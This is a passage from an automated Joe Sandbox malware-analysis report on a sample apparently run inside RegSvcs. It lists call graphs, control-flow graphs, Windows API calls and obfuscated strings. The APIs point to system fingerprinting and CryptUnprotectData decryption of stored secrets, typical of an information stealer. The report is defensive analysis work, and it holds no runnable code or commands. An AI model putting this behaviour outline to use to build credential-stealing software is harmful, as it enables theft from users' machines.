43e530 RtlFreeHeap 14630->14631 14631->14635 14632->14630 14667 43fcf0 LdrInitializeThunk 14632->14667 14636 41940e 14635->14636 14635->14648 14668 43fcf0 LdrInitializeThunk 14635->14668 14636->14648 14669 43fcf0 LdrInitializeThunk 14636->14669 14638 41946c 14638->14636 14639 419473 14638->14639 14640 41951c 14639->14640 14643 4194a8 14639->14643 14670 43fcf0 LdrInitializeThunk 14639->14670 14640->14640 14642 43e510 RtlAllocateHeap 14640->14642 14640->14648 14647 4195c9 14642->14647 14643->14640 14671 43fcf0 LdrInitializeThunk 14643->14671 14644 4195f8 14646 43e530 RtlFreeHeap 14644->14646 14646->14648 14647->14644 14672 43fcf0 LdrInitializeThunk 14647->14672 14648->14598 14652 419621 14652->14644 14653 43e530 RtlFreeHeap 14652->14653 14654 43fcf0 LdrInitializeThunk 14652->14654 14655 43e510 RtlAllocateHeap 14652->14655 14673 43e7c0 14652->14673 14677 43e8e0 14652->14677 14653->14652 14654->14652 14655->14652 14657 413cb0 14656->14657 14657->14657 14658 442da0 LdrInitializeThunk 14657->14658 14659 413dcd 14658->14659 14660 442da0 LdrInitializeThunk 14659->14660 14661 43e530 RtlFreeHeap 14659->14661 14662 43e510 RtlAllocateHeap 14659->14662 14663 43fcf0 LdrInitializeThunk 14659->14663 14660->14659 14661->14659 14662->14659 14663->14659 14664->14624 14665->14625 14666->14626 14667->14630 14668->14638 14669->14648 14670->14643 14671->14640 14672->14652 14674 43e84e 14673->14674 14675 43e7d1 14673->14675 14674->14652 14675->14674 14681 43fcf0 LdrInitializeThunk 14675->14681 14678 43e90e 14677->14678 14679 43e8e6 14677->14679 14678->14652 14679->14678 14682 43fcf0 LdrInitializeThunk 14679->14682 14681->14674 14682->14678 14397 44065e 14398 44068f 14397->14398 14399 440668 14397->14399 14403 43fcf0 LdrInitializeThunk 14398->14403 14399->14398 14404 43fcf0 LdrInitializeThunk 14399->14404 14402 44071a 14403->14402 14404->14398 14683 40d61a 14684 40d640 14683->14684 14687 43b500 14684->14687 14686 40d742 14688 43b530 14687->14688 14688->14688 14689 43b890 CoCreateInstance 14688->14689 14690 43bcce 14689->14690 14691 43b8dd SysAllocString 14689->14691 14692 43bcde GetVolumeInformationW 14690->14692 14695 43b997 14691->14695 14694 43bcff 14692->14694 14694->14686 14696 43b99f CoSetProxyBlanket 14695->14696 14697 43bcbd SysFreeString 14695->14697 14698 43bcb3 14696->14698 14699 43b9bf SysAllocString 14696->14699 14697->14690 14698->14697 14701 43ba90 14699->14701 14701->14701 14702 43bab7 SysAllocString 14701->14702 14705 43bade 14702->14705 14703 43bc9e SysFreeString SysFreeString 14703->14698 14704 43bc94 14704->14703 14705->14703 14705->14704 14706 43bb22 VariantInit 14705->14706 14708 43bb70 14706->14708 14707 43bc83 VariantClear 14707->14704 14708->14707 14709 44011f 14710 440160 14709->14710 14711 44028e 14710->14711 14713 43fcf0 LdrInitializeThunk 14710->14713 14713->14711 14714 40de1e 14715 40de24 14714->14715 14716 40de33 CoUninitialize 14715->14716 14717 40de60 14716->14717 14405 408860 14407 40886f 14405->14407 14406 408ab7 ExitProcess 14407->14406 14408 408884 GetCurrentProcessId GetCurrentThreadId 14407->14408 14415 408a9b 14407->14415 14409 4088a9 14408->14409 14410 4088ad SHGetSpecialFolderPathW GetForegroundWindow 14408->14410 14409->14410 14411 408959 14410->14411 14416 43e510 14411->14416 14413 408a15 14413->14415 14419 40cac0 CoInitializeEx 14413->14419 14415->14406 14420 4412a0 14416->14420 14418 43e51a RtlAllocateHeap 14418->14413 14421 4412b0 14420->14421 14421->14418 14421->14421 14718 40b620 14719 40b27e 14718->14719 14721 40b20e 14718->14721 14719->14721 14722 43fc80 14719->14722 14723 43fcd3 14722->14723 14724 43fca0 14722->14724 14725 43fcb4 14722->14725 14726 43fcc8 14722->14726 14728 43e530 RtlFreeHeap 14723->14728 14724->14723 14724->14725 14729 43fcb9 RtlReAllocateHeap 14725->14729 14727 43e510 RtlAllocateHeap 14726->14727 14730 43fcce 14727->14730 14728->14730 14729->14730 14730->14719 14422 42e0e3 14423 42e0f3 14422->14423 14424 42e201 GetComputerNameExA 14423->14424 14425 42e243 14424->14425 14425->14425 14426 4209e0 14427 4209f4 14426->14427 14431 420b01 14426->14431 14427->14427 14432 420b20 14427->14432 14429 420adc 14430 41ead0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14429->14430 14429->14431 14430->14431 14433 420b30 14432->14433 14433->14433 14436 442ef0 14433->14436 14435 420c1f 14437 442f10 14436->14437 14438 442ffe 14437->14438 14440 43fcf0 LdrInitializeThunk 14437->14440 14438->14435 14440->14438 14441 42ea61 14442 42ea6c 14441->14442 14443 42eb6c GetPhysicallyInstalledSystemMemory 14442->14443 14444 42eba0 14443->14444 14444->14444 14445 43e560 14446 43e59e 14445->14446 14447 43e587 14445->14447 14449 43e510 RtlAllocateHeap 14446->14449 14452 43e788 14446->14452 14447->14446 14455 43fcf0 LdrInitializeThunk 14447->14455 14451 43e655 14449->14451 14454 43e68f 14451->14454 14456 43fcf0 LdrInitializeThunk 14451->14456 14457 43e530 14454->14457 14455->14446 14456->14454 14458 43e543 14457->14458 14459 43e545 14457->14459 14458->14452 14460 43e54a RtlFreeHeap 14459->14460 14460->14452 14461 43906b 14465 4415f0 14461->14465 14463 439089 GetUserDefaultUILanguage 14464 4390c0 14463->14464 14466 441610 14465->14466 14466->14463 14467 432f73 CoSetProxyBlanket 14731 42f933 14732 42f970 14731->14732 14732->14732 14733 42fa24 GetComputerNameExA 14732->14733 14468 420df0 14483 442da0 14468->14483 14470 421463 14471 420e30 14471->14470 14472 43e510 RtlAllocateHeap 14471->14472 14473 420e6e 14472->14473 14480 420e85 14473->14480 14487 43fcf0 LdrInitializeThunk 14473->14487 14474 421445 14476 43e530 RtlFreeHeap 14474->14476 14478 421455 14476->14478 14477 43e510 RtlAllocateHeap 14477->14480 14478->14470 14489 43fcf0 LdrInitializeThunk 14478->14489 14480->14474 14480->14477 14482 43e530 RtlFreeHeap 14480->14482 14488 43fcf0 LdrInitializeThunk 14480->14488 14482->14480 14485 442dc0 14483->14485 14484 442e9e 14484->14471 14485->14484 14490 43fcf0 LdrInitializeThunk 14485->14490 14487->14473 14488->14480 14489->14478 14490->14484 14734 42eeb6 14736 42eee0 14734->14736 14735 42ef6e 14736->14735 14738 43fcf0 LdrInitializeThunk 14736->14738 14738->14735 14739 4368b6 14740 4368bb 14739->14740 14741 4368f1 GetSystemMetrics GetSystemMetrics 14740->14741 14742 436930 14741->14742 14743 43feb4 14744 43fec0 14743->14744 14744->14744 14745 43ff55 GetForegroundWindow 14744->14745 14746 43ff65 14745->14746 14491 4402ff 14492 44031d 14491->14492 14494 44033e 14491->14494 14492->14494 14495 43fcf0 LdrInitializeThunk 14492->14495 14495->14494 14496 40cafe CoInitializeSecurity 14497 40dbff 14498 40dc09 14497->14498 14499 40dc23 14497->14499 14498->14499 14501 43fcf0 LdrInitializeThunk 14498->14501 14501->14499

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 43b500-43b521 1 43b530-43b544 0->1 1->1 2 43b546-43b55f 1->2 3 43b560-43b584 2->3 3->3 4 43b586-43b5cf 3->4 5 43b5d0-43b601 4->5 5->5 6 43b603-43b61f 5->6 8 43b625-43b62f 6->8 9 43b70e-43b719 6->9 10 43b630-43b6b0 8->10 11 43b720-43b74d 9->11 10->10 12 43b6b6-43b6cf 10->12 11->11 13 43b74f-43b7b5 11->13 14 43b6d0-43b6ff 12->14 15 43b7c0-43b824 13->15 14->14 16 43b701-43b706 14->16 15->15 17 43b826-43b86e 15->17 16->9 18 43b870-43b88e 17->18 18->18 19 43b890-43b8d7 CoCreateInstance 18->19 20 43bcce-43bcfd call 4415f0 GetVolumeInformationW 19->20 21 43b8dd-43b911 19->21 26 43bd07-43bd09 20->26 27 43bcff-43bd03 20->27 23 43b920-43b970 21->23 23->23 25 43b972-43b999 SysAllocString 23->25 30 43b99f-43b9b9 CoSetProxyBlanket 25->30 31 43bcbd-43bcca SysFreeString 25->31 29 43bd1d-43bd24 26->29 27->26 32 43bd30-43bd4b 29->32 33 43bd26-43bd2d 29->33 34 43bcb3-43bcb9 30->34 35 43b9bf-43b9d4 30->35 31->20 36 43bd50-43bd7a 32->36 33->32 34->31 37 43b9e0-43ba0e 35->37 36->36 38 43bd7c-43bdae 36->38 37->37 39 43ba10-43ba88 SysAllocString 37->39 40 43bdb0-43bdfb 38->40 41 43ba90-43bab5 39->41 40->40 42 43bdfd-43be2f call 41d2d0 40->42 41->41 44 43bab7-43bae0 SysAllocString 41->44 46 43be30-43be38 42->46 49 43bae6-43bb08 44->49 50 43bc9e-43bcaf SysFreeString * 2 44->50 46->46 48 43be3a-43be48 46->48 51 43bd10-43bd17 48->51 52 43be4e-43be5e call 4081f0 48->52 57 43bc94-43bc9a 49->57 58 43bb0e-43bb11 49->58 50->34 51->29 54 43be63-43be6a 51->54 52->51 57->50 58->57 59 43bb17-43bb1c 58->59 59->57 60 43bb22-43bb6f VariantInit 59->60 61 43bb70-43bb84 60->61 61->61 62 43bb86-43bb90 61->62 63 43bb94-43bb96 62->63 64 43bc83-43bc90 VariantClear 63->64 65 43bb9c-43bba5 63->65 64->57 65->64 66 43bbab-43bbbc 65->66 67 43bbbe-43bbc3 66->67 68 43bbfd 66->68 69 43bbdc-43bbe0 67->69 70 43bbff-43bc43 call 408170 call 408ef0 68->70 72 43bbe2-43bbeb 69->72 73 43bbd0 69->73 81 43bc73-43bc7c call 408180 70->81 82 43bc45-43bc5b 70->82 76 43bbf2-43bbf6 72->76 77 43bbed-43bbf0 72->77 75 43bbd1-43bbda 73->75 75->69 75->70 76->75 79 43bbf8-43bbfb 76->79 77->75 79->75 81->64 82->81 83 43bc5d-43bc6a 82->83 83->81 85 43bc6c-43bc6f 83->85 85->81
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(oTUJ,00000000,00000001,sg`a,00000000), ref: 0043B8CB
                                                                                • SysAllocString.OLEAUT32(0E7BD6F4), ref: 0043B973
                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043B9B1
                                                                                • SysAllocString.OLEAUT32(0E7BD6F4), ref: 0043BA11
                                                                                • SysAllocString.OLEAUT32(DB9FD9AB), ref: 0043BABC
                                                                                • VariantInit.OLEAUT32(?), ref: 0043BB2A
                                                                                • VariantClear.OLEAUT32(?), ref: 0043BC84
                                                                                • SysFreeString.OLEAUT32 ref: 0043BCA7
                                                                                • SysFreeString.OLEAUT32(?), ref: 0043BCAD
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0043BCBE
                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,0E7BD6F4,00000000,00000000,00000000,00000000), ref: 0043BCF6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                • String ID: %"$%^$UR$oTUJ$rs|}$sg`a
                                                                                • API String ID: 2573436264-1825865773
                                                                                • Opcode ID: a888ef136d15863bae528aff82fb9e46d04ff07ad182c69d3036ccaea80abe13
                                                                                • Instruction ID: afc6abe845a1fd5c7cf90e64565d774839b6a278b4780d0bab49e573e790c824
                                                                                • Opcode Fuzzy Hash: a888ef136d15863bae528aff82fb9e46d04ff07ad182c69d3036ccaea80abe13
                                                                                • Instruction Fuzzy Hash: E342F176A083409BD314CF24C88176BBBE2EBC9714F14992DE6999B390D779D806CB86

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 87 410409-410421 88 410423-410426 87->88 89 410428-41043d 88->89 90 41043f-410472 call 4018b0 88->90 89->88 93 410474-410477 90->93 94 410479-4104b6 93->94 95 4104b8-4104e5 call 4018b0 93->95 94->93 98 4104e7-410563 call 413870 95->98 99 4104e9-4104ed 95->99 106 410565 98->106 107 410567-4105af call 408170 call 40a740 98->107 101 410f75 99->101 103 411996 101->103 105 411998-41199b call 401f40 103->105 114 40eaf5-40eb1d call 401f50 105->114 115 40eaee-4119ac 105->115 106->107 119 4105b1-4105b4 107->119 123 40eb1f-40eb22 114->123 121 4105f0-41060b call 4018b0 119->121 122 4105b6-4105ee 119->122 130 41065a-41069c call 413870 121->130 131 41060d-410630 call 413870 121->131 122->119 125 40eb44-40eb6f call 401e40 123->125 126 40eb24-40eb42 123->126 132 40eb71-40eb96 125->132 133 40eb73 125->133 126->123 139 4106a0-410743 call 408170 call 40a740 RtlExpandEnvironmentStrings 130->139 140 41069e 130->140 146 410632 131->146 147 410634-410658 call 408170 call 40a740 131->147 141 40eb9a-40eb9d 132->141 133->105 158 410745-410748 139->158 140->139 144 40ec0e-40ec63 call 4019b0 141->144 145 40eb9f-40ec0c 141->145 144->103 155 40ec69 144->155 145->141 146->147 147->130 155->103 159 41077a-41078b 158->159 160 41074a-410778 158->160 161 4107a3-4107bc 159->161 162 41078d-41079e call 408180 159->162 160->158 163 4107c0-410816 call 408170 RtlExpandEnvironmentStrings 161->163 164 4107be 161->164 162->101 170 410818-41083a call 408180 * 2 163->170 171 41083f-41086a call 408180 163->171 164->163 186 410f73 170->186 180 41086c-41086f 171->180 182 410871-4108d0 180->182 183 4108d2-4108fd call 4018b0 180->183 182->180 188 410903-410966 call 413870 183->188 189 410998-4109b0 183->189 186->101 196 410968 188->196 197 41096a-410996 call 408170 call 40a740 188->197 190 4109b2-4109b5 189->190 192 410a49-410a8f call 401bb0 190->192 193 4109bb-410a44 190->193 200 410a91-410a94 192->200 193->190 196->197 197->189 202 410ae7-410b0f call 401ac0 200->202 203 410a96-410ae5 200->203 208 410e32-410eb6 call 408bb0 call 414710 202->208 209 410b15-410b55 call 413c80 call 401f40 202->209 203->200 216 410ebb-410ecc call 4097e0 208->216 218 410b57 209->218 219 410b59-410b7f call 408170 209->219 224 410f0b-410f3b call 408180 * 2 216->224 225 410ece-410edd 216->225 218->219 226 410b81-410b8e 219->226 227 410bab-410bad 219->227 259 410f45-410f52 224->259 260 410f3d-410f40 call 408180 224->260 229 410eff-410f07 call 408180 225->229 230 410edf-410ee6 225->230 243 410b90-410b9c call 413990 226->243 235 410baf-410bb1 227->235 229->224 231 410ee8-410efb call 413b10 230->231 247 410efd 231->247 240 410bb3-410bba 235->240 241 410bbf-410bfe call 401f50 235->241 240->208 250 410c00-410c03 241->250 255 410b9e-410ba9 243->255 247->229 253 410c63-410c97 call 4018b0 250->253 254 410c05-410c61 250->254 265 410c99-410c9c 253->265 254->250 255->227 263 410f65-410f71 call 408c90 259->263 264 410f54-410f60 call 408180 259->264 260->259 263->186 264->263 268 410cc1-410d08 call 4018b0 265->268 269 410c9e-410cbf 265->269 274 410d0c-410d0f 268->274 269->265 275 410d11-410d4d 274->275 276 410d4f-410d9c call 401bb0 274->276 275->274 279 410d9e-410da1 276->279 280 410dc0-410e2d call 401bb0 call 4139b0 279->280 281 410da3-410dbe 279->281 280->235 281->279
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #$$$)$2$7$@$E$L$f$h$z
                                                                                • API String ID: 0-1702965656
                                                                                • Opcode ID: 47a137b1661f5925dd58c261c5a76382b787ec10d88be9ee8ab9ba8dad9fe285
                                                                                • Instruction ID: 5f216cbf006f53b486acb94d90d1bb766118e49a9675ab976538cfc79890ba45
                                                                                • Opcode Fuzzy Hash: 47a137b1661f5925dd58c261c5a76382b787ec10d88be9ee8ab9ba8dad9fe285
                                                                                • Instruction Fuzzy Hash: 9A62D73260C7808BD3249B39C59539FBBE1AFC5324F194A2EE4E9D73D1D67888818B47

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 397 414e18-414e1b 398 414e22 397->398 399 4151c4-4151c7 397->399 400 414e47-414e70 call 443050 397->400 401 414ee6-414eee 397->401 402 414e28-414e2e call 408180 397->402 403 414eab-414eb3 397->403 404 414e31-414e33 397->404 405 414fd1-414fd5 397->405 406 4151f2-415254 397->406 407 414e77-414ea4 call 408170 call 4430e0 397->407 408 414e38 397->408 409 414edd-414ee3 call 408180 397->409 410 414ebc-414ed4 call 401000 397->410 411 414e3e-414e44 call 408180 397->411 399->406 400->399 400->401 400->403 400->405 400->406 400->407 400->409 400->410 414 414ef0-414eff 401->414 415 414f2b-414f8f call 401aa0 401->415 402->404 403->410 417 415791-415798 404->417 421 414fe0-414fe6 405->421 420 415260-41528b 406->420 407->399 407->401 407->403 407->405 407->406 407->409 407->410 409->401 410->409 411->400 426 414f00-414f07 414->426 444 414f90-414fb1 415->444 420->420 431 41528d-4152ae call 401dc0 420->431 421->421 432 414fe8-414ff9 421->432 434 414f10-414f17 426->434 435 414f09-414f0c 426->435 446 4152b5-4152f7 431->446 447 415445-415458 call 419000 431->447 448 41545f-415466 431->448 438 415000 432->438 439 414ffb-414ffe 432->439 434->415 443 414f19-414f28 call 43fcf0 434->443 435->426 442 414f0e 435->442 440 415001-41500d 438->440 439->438 439->440 449 415014 440->449 450 41500f-415012 440->450 442->415 443->415 444->444 452 414fb3-414fca call 401dc0 444->452 453 415300-415318 446->453 447->448 465 4157d0 447->465 461 41546f-415471 448->461 454 415015-41502f call 408170 449->454 450->449 450->454 452->399 452->405 452->406 453->453 458 41531a-41533e call 401df0 453->458 468 415035-41503c 454->468 469 415129-415195 call 4415f0 454->469 458->461 471 415345-415373 458->471 466 415480-415490 call 401e10 461->466 477 415680-41568e 466->477 478 415740 466->478 479 415727-415733 call 408180 466->479 480 4156c6-4156ef call 41b570 466->480 481 41566a-41566c 466->481 482 41574a-415753 call 408180 466->482 483 4156f0-415716 call 41b570 466->483 484 415770 466->484 485 415772-415777 466->485 486 415497-4154ae call 401e20 466->486 487 415656-415663 466->487 488 415756-415767 466->488 489 41577c 466->489 490 41571f 466->490 472 415054-4150a0 call 41c4b0 * 2 468->472 491 41519a-4151bd CryptUnprotectData 469->491 475 415380-4153da 471->475 517 415040-41504e 472->517 518 4150a2-4150b9 call 41c4b0 472->518 475->475 494 4153dc-415440 call 41b570 475->494 501 4156b1-4156bd 477->501 502 415690-415695 477->502 478->482 479->478 480->483 481->477 482->488 483->490 484->485 485->466 514 415500 486->514 515 4154b0-4154b3 486->515 487->477 487->478 487->479 487->480 487->481 487->482 487->483 487->484 487->485 487->488 487->490 488->484 499 415780-41578f call 401f80 489->499 490->479 491->398 491->399 491->400 491->401 491->402 491->403 491->404 491->405 491->406 491->407 491->408 491->409 491->410 491->411 500 414e16 491->500 494->499 499->417 500->397 501->480 511 4156a0-4156af 502->511 511->501 511->511 520 415502-415505 514->520 519 4154c9-4154d7 515->519 517->469 517->472 518->517 531 4150bb-4150e4 518->531 524 4154c0 519->524 525 4154d9-4154db 519->525 521 415510 520->521 522 415507-41550c 520->522 526 415517-41554b call 408170 call 40a740 521->526 522->526 528 4154c1-4154c7 524->528 525->524 529 4154dd-4154e8 525->529 540 415560-415562 526->540 541 41554d-415555 526->541 528->519 528->520 529->524 532 4154ea-4154f3 529->532 531->517 534 4150ea-415104 call 41c4b0 531->534 532->528 535 4154f5-4154f8 532->535 534->517 542 41510a-415124 534->542 535->528 543 415565-415579 call 408170 540->543 541->543 542->517 546 415591-4155aa 543->546 547 41557b-41557e 543->547 549 4155b0-4155e6 546->549 548 415580-41558f 547->548 548->546 548->548 549->549 550 4155e8-415600 549->550 551 415630 550->551 552 415602-41560f 550->552 554 415637-415642 call 442ef0 551->554 553 415610-41561f 552->553 553->553 555 415621 553->555 557 415647-41564f 554->557 555->554 557->477 557->478 557->479 557->480 557->481 557->482 557->483 557->484 557->485 557->487 557->488 557->490
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BN<6$FMUN$X$[GI2$imw-$loay$mkph$rWA
                                                                                • API String ID: 0-2486209729
                                                                                • Opcode ID: 4f7f6c04d7f5ccf9213ed43d0545685558d0a1c5fa1e2219ce89839fd548c3d9
                                                                                • Instruction ID: c10d9f0e3356b82c98d7d7de0b0898125241ab05ad05d269be375f3120399a9f
                                                                                • Opcode Fuzzy Hash: 4f7f6c04d7f5ccf9213ed43d0545685558d0a1c5fa1e2219ce89839fd548c3d9
                                                                                • Instruction Fuzzy Hash: B832D175908341DBD724CF24D8917EFB7E2AFC5314F18892EE89987361EB399841CB86

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 600 408860-408871 call 43f640 603 408ab7-408ab9 ExitProcess 600->603 604 408877-40887e call 438690 600->604 607 408ab2 call 43fc60 604->607 608 408884-4088a7 GetCurrentProcessId GetCurrentThreadId 604->608 607->603 610 4088a9-4088ab 608->610 611 4088ad-408953 SHGetSpecialFolderPathW GetForegroundWindow 608->611 610->611 612 4089d9-4089e9 611->612 613 408959-4089d7 611->613 614 4089f0-408a0a 612->614 613->612 614->614 615 408a0c-408a38 call 43e510 614->615 618 408a40-408a5c 615->618 619 408a76-408a94 call 409d10 618->619 620 408a5e-408a74 618->620 623 408aa0-408aa7 619->623 624 408a96 call 40cac0 619->624 620->618 623->607 626 408aa9-408aaf call 408180 623->626 628 408a9b call 40b670 624->628 626->607 628->623
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00408884
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040888D
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408934
                                                                                • GetForegroundWindow.USER32 ref: 0040894B
                                                                                • ExitProcess.KERNEL32 ref: 00408AB9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                • String ID: dI$$dI$
                                                                                • API String ID: 4063528623-1516109411
                                                                                • Opcode ID: a39a7424fe1cc2e71e79c43a036eb368bfdfd154a348dbc81d7ca1ba6e4cef89
                                                                                • Instruction ID: 0f27b9d6ffdb68be40ab04c725010e9be45f58b52e78c7b1d99a502d1e0908e8
                                                                                • Opcode Fuzzy Hash: a39a7424fe1cc2e71e79c43a036eb368bfdfd154a348dbc81d7ca1ba6e4cef89
                                                                                • Instruction Fuzzy Hash: BC513A73B443044BD318AF668D4635AB6D79BC5310F0EC13EA994EB3E2EE7C9C058689

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 638 4097e0-4097ee 639 4097f4-409865 call 405ff0 call 408170 638->639 640 409cbb 638->640 646 409870-4098a2 639->646 641 409cbd-409cc9 640->641 646->646 647 4098a4-4098d4 call 4090d0 646->647 650 4098e0-409938 647->650 650->650 651 40993a-40996f call 4090d0 650->651 654 409970-40999d 651->654 654->654 655 40999f-4099cf call 4090d0 654->655 658 4099d0-4099e4 655->658 658->658 659 4099e6-4099ee 658->659 660 4099f0-409a33 659->660 660->660 661 409a35-409a52 call 4090d0 660->661 664 409a60-409a7e 661->664 664->664 665 409a80-409b4a call 409390 664->665 668 409b50-409b78 665->668 668->668 669 409b7a-409b82 668->669 670 409ba1-409bac 669->670 671 409b84-409b8f 669->671 673 409bd1-409c04 670->673 674 409bae-409bb1 670->674 672 409b90-409b9f 671->672 672->670 672->672 676 409c10-409c74 673->676 675 409bc0-409bcf 674->675 675->673 675->675 676->676 677 409c76-409c8f call 40bfe0 676->677 679 409c94-409cb9 call 408180 677->679 679->641
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: :;$=?Gy$FE2106E6753D8C67E2FCF1EEA745798E$JCzK$Jsx}$OKWM$rGyD
                                                                                • API String ID: 0-916079265
                                                                                • Opcode ID: 7df7811009de0c557b198160589248ff6eafb090f733360dca0e9c439eec107b
                                                                                • Instruction ID: cad39518815db202ea96186d45b627999a351dfe9c3fa709a21e27b0d6e151ad
                                                                                • Opcode Fuzzy Hash: 7df7811009de0c557b198160589248ff6eafb090f733360dca0e9c439eec107b
                                                                                • Instruction Fuzzy Hash: 31C1687290C3404FC314DF648850A6FBBE5EBD1314F184A2DE8E19B392DB39D905CB96

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 682 424d94-424d9a 683 424da3 682->683 684 424d9c-424da1 682->684 685 424da6-424dcc call 408170 RtlExpandEnvironmentStrings 683->685 684->685 688 424dd3 685->688 689 424deb-424df4 685->689 690 424ddb-424de6 call 408180 685->690 688->690 692 424df6-424dfb 689->692 693 424dfd 689->693 696 42545c-425468 690->696 695 424e04-424e3a call 408170 692->695 693->695 699 424e40-424e6e 695->699 699->699 700 424e70-424e78 699->700 701 424e91-424e9d 700->701 702 424e7a-424e7f 700->702 704 424ec1-424ecc call 442ef0 701->704 705 424e9f-424ea3 701->705 703 424e80-424e8f 702->703 703->701 703->703 708 424ed1-424ed9 704->708 706 424eb0-424ebf 705->706 706->704 706->706 709 424ef0-424ef9 708->709 710 424ee0-424ee7 708->710 711 424f02 709->711 712 424efb-424f00 709->712 710->709 713 424f09-424faf call 408170 711->713 712->713 716 424fb0-425000 713->716 716->716 717 425002-42500a 716->717 718 425031-42503d 717->718 719 42500c-425013 717->719 721 425061-425081 GetLogicalDrives call 442ef0 718->721 722 42503f-425043 718->722 720 425020-42502f 719->720 720->718 720->720 721->696 726 4251e0-4251fa 721->726 727 425444-42544a call 408180 721->727 728 425345 721->728 729 42532a 721->729 730 4250a8 721->730 731 4250ae-4250c8 721->731 732 42544d-425453 call 408180 721->732 733 425090 721->733 734 425330 721->734 735 425096-4250a0 721->735 736 425336-42533c call 408180 721->736 737 425315 721->737 738 42531b-425321 call 408180 721->738 723 425050-42505f 722->723 723->721 723->723 744 425200-425214 726->744 727->732 728->727 729->734 730->731 742 4250d0-4250e4 731->742 732->696 733->735 734->736 735->730 736->728 737->738 738->729 742->742 748 4250e6-425166 742->748 744->744 750 425216-425296 744->750 751 425170-4251b8 748->751 752 4252a0-4252e8 750->752 751->751 753 4251ba-4251df call 420c70 751->753 752->752 754 4252ea-42530d call 420c70 752->754 753->726 754->737
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00424DC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: uw$xs
                                                                                • API String ID: 237503144-3936089760
                                                                                • Opcode ID: 743cabb76c2ea920e95c809ba51b0d67bf8ae09e7769f33e6732e4632437ce9a
                                                                                • Instruction ID: b15e04ffbc624c4da66ce583d04e0a24f44993f06141af6d34d746189b841cb6
                                                                                • Opcode Fuzzy Hash: 743cabb76c2ea920e95c809ba51b0d67bf8ae09e7769f33e6732e4632437ce9a
                                                                                • Instruction Fuzzy Hash: A1E1FEB56183009BD304DF25E892A6FBBF1FF96314F44892DE2828B251E7788905CB5B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 816 4368b6-436997 call 413c80 GetSystemMetrics * 2 824 43699e-436a3b 816->824
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-3916222277
                                                                                • Opcode ID: 00069894bbbf35a809fa40497602a42182611d61aadf29498c5887331f36a6c3
                                                                                • Instruction ID: f40077607113824c34a829605e7f39712f0a08307254047396860f60dabc99f5
                                                                                • Opcode Fuzzy Hash: 00069894bbbf35a809fa40497602a42182611d61aadf29498c5887331f36a6c3
                                                                                • Instruction Fuzzy Hash: 195182B5E142188FCB40EFACD985A9EBBF0BB49300F118569E898E7350D734AD45CF96
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EB77
                                                                                Strings
                                                                                Memory Dump Source
